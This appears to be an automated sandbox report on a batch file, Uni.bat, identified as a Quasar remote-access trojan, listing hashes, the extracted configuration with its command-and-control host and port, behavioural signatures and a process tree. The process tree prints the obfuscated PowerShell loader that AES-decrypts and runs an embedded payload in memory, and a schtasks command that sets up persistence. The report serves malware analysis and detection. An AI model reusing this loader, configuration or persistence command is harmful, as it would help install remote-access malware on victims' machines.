Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
24-06-2024 23:07
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240611-en
General
-
Target
Uni.bat
-
Size
253KB
-
MD5
6116316574a1311a2e768ef21255430d
-
SHA1
684dec7251dbacf3e3b5a3cac0492df268f7f9a3
-
SHA256
f975a314f9f0ac6527acf5098bd0c9ce8800c05b83ce3c5af01c1cb8e3bbbd5b
-
SHA512
daf318e0dde57bf13b2b30bdff1556749caf3ebda2cffd5ead57c2c998aae763214226121f02996d48bcea54d53b9c2c352c21a8638b0d42f36c8f41896be2f2
-
SSDEEP
3072:PfaskbNKw91ey00VTUsMHdJmMQ5C6QCf8qb/qV3/PJHnigpqoineD/QrM47f9Jms:nef9NVbkd5UzZfYh6n7P7KK2X78EM
Malware Config
Extracted
quasar
3.0.1
Office04
wireless-boston.gl.at.ply.gg:41366
QSR_MUTEX_W1ckGYHOGswdBegmKd
-
encryption_key
QbY1WN4Surh1trMXzt97
-
install_name
system.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
system
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3652-19-0x000002087DD00000-0x000002087DD5E000-memory.dmp family_quasar -
Executes dropped EXE 2 IoCs
Processes:
Uni.bat.exesystem.exepid process 3652 Uni.bat.exe 4040 system.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
Uni.bat.exedescription ioc process File created C:\Windows\SysWOW64\SubDir\system.exe Uni.bat.exe File opened for modification C:\Windows\SysWOW64\SubDir\system.exe Uni.bat.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
Uni.bat.exesystem.exepid process 3652 Uni.bat.exe 3652 Uni.bat.exe 4040 system.exe 4040 system.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Uni.bat.exesystem.exedescription pid process Token: SeDebugPrivilege 3652 Uni.bat.exe Token: SeDebugPrivilege 4040 system.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
cmd.exenet.exeUni.bat.exedescription pid process target process PID 2372 wrote to memory of 1184 2372 cmd.exe net.exe PID 2372 wrote to memory of 1184 2372 cmd.exe net.exe PID 1184 wrote to memory of 3816 1184 net.exe net1.exe PID 1184 wrote to memory of 3816 1184 net.exe net1.exe PID 2372 wrote to memory of 3652 2372 cmd.exe Uni.bat.exe PID 2372 wrote to memory of 3652 2372 cmd.exe Uni.bat.exe PID 3652 wrote to memory of 1464 3652 Uni.bat.exe schtasks.exe PID 3652 wrote to memory of 1464 3652 Uni.bat.exe schtasks.exe PID 3652 wrote to memory of 4040 3652 Uni.bat.exe system.exe PID 3652 wrote to memory of 4040 3652 Uni.bat.exe system.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $LUjXk = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pfSAb in $LUjXk) { if ($pfSAb.StartsWith(':: ')) { $ysrPJ = $pfSAb.Substring(3); break; }; };$ydMoK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ysrPJ);$QmOjg = New-Object System.Security.Cryptography.AesManaged;$QmOjg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QmOjg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QmOjg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8JDdwdCN8f9GIQeixAyEv80OWR2XU9cSTyINtWtC9E=');$QmOjg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZMxKZ063xFXq46C7vuYyiQ==');$FoDTE = $QmOjg.CreateDecryptor();$ydMoK = $FoDTE.TransformFinalBlock($ydMoK, 0, $ydMoK.Length);$FoDTE.Dispose();$QmOjg.Dispose();$bzYHg = New-Object System.IO.MemoryStream(, $ydMoK);$EACsF = New-Object System.IO.MemoryStream;$cWBZp = New-Object System.IO.Compression.GZipStream($bzYHg, [IO.Compression.CompressionMode]::Decompress);$cWBZp.CopyTo($EACsF);$cWBZp.Dispose();$bzYHg.Dispose();$EACsF.Dispose();$ydMoK = $EACsF.ToArray();$fFqIs = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ydMoK);$sWumU = $fFqIs.EntryPoint;$sWumU.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\SubDir\system.exe"C:\Windows\SysWOW64\SubDir\system.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rvo2d50f.kpt.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/3652-17-0x000002087DCD0000-0x000002087DD04000-memory.dmpFilesize
208KB
-
memory/3652-14-0x000002087DCA0000-0x000002087DCC2000-memory.dmpFilesize
136KB
-
memory/3652-15-0x00007FFC50DA0000-0x00007FFC51861000-memory.dmpFilesize
10.8MB
-
memory/3652-16-0x00007FFC50DA0000-0x00007FFC51861000-memory.dmpFilesize
10.8MB
-
memory/3652-4-0x00007FFC50DA3000-0x00007FFC50DA5000-memory.dmpFilesize
8KB
-
memory/3652-19-0x000002087DD00000-0x000002087DD5E000-memory.dmpFilesize
376KB
-
memory/3652-20-0x000002087DDB0000-0x000002087DDC2000-memory.dmpFilesize
72KB
-
memory/3652-21-0x000002087E8E0000-0x000002087E91C000-memory.dmpFilesize
240KB
-
memory/3652-38-0x00007FFC50DA0000-0x00007FFC51861000-memory.dmpFilesize
10.8MB
-
memory/4040-36-0x0000019A6C210000-0x0000019A6C254000-memory.dmpFilesize
272KB
-
memory/4040-37-0x0000019A6C2E0000-0x0000019A6C356000-memory.dmpFilesize
472KB